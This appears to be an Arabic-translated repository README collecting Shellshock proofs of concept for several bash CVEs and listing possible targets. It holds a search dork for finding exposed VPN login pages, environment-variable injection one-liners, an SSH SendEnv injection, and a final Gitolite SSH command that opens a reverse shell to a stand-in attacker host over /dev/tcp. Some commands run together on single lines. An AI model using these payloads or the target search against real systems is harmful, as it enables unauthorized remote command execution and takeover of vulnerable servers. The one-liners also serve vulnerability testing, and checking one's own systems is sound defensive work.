
مجموعة من إثباتات المفهوم والأهداف المحتملة لـ #ShellShocker
مجموعة من إثباتات المفهوم والأهداف المحتملة لـ #ShellShocker
رابط ويكيبيديا: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
يرجى تقديم طلب سحب (pull request) إذا كان لديك المزيد من الروابط أو الموارد الأخرى
تخمين: (غير مؤكد، قد يكون قابلاً للاستغلال)
inurl:inurl:/dana-na/auth/url_default/welcome.cgi
إذا كانت لديك أكواد PoC لأي من هذه، فيرجى تقديم issue أو pull request مع رابط.
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c idسينشئ ملفًا باسم echo في دليل العمل الحالي مع التاريخ بداخله، إذا كانت الثغرة موجودة
env X='() { (a)=>\' bash -c "echo date"; cat echobash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :سيحدث خطأ تجزئة (segfault) إذا كانت الثغرة موجودة
env X='() { x() { _; }; x() { _; } <<a; }' bash -c :LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_Xssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'